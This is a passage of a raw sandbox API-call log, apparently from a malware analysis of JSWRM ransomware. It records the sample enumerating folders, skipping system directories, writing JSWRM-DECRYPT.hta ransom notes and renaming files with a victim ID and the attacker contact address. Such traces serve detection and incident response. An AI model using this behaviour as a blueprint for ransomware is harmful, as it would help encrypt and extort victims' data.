nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.325] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.325] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.326] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.326] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0068.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0068.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.326] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10088912540391544) returned 0 [0068.327] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.327] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.327] CloseHandle (hObject=0xffffffff) returned 1 [0068.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0068.327] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0068.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0068.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0068.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.327] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0068.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0068.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0068.327] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.327] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0068.328] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2=".") returned 1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="..") returned 1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="...") returned 1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="windows") returned -1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="recovery") returned -1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="perflogs") returned -1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="documents and settings") returned 1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="$RECYCLE.BIN") returned 1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="system volume information") returned -1 [0068.328] lstrcmpiW (lpString1="hu-HU", lpString2="msocache") returned -1 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.328] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\jswrm-decrypt.hta")) returned 0xffffffff [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.328] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0068.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.329] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.329] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.329] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.330] CloseHandle (hObject=0x454) returned 1 [0068.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.330] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0068.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.330] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0068.331] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hu-hu\\jswrm-decrypt.hta")) returned 0x20 [0068.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.331] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.331] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0068.331] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hu-HU\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f626fbf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0068.331] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.331] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06d0656, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f626fbf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.331] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.331] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.331] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f626fbf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f626fbf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f626fbf, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.331] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.332] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0068.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0068.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0068.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0068.332] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c3a52f7, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3c3a52f7, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3c3a52f7, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.332] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.332] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0068.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0068.333] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0068.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: 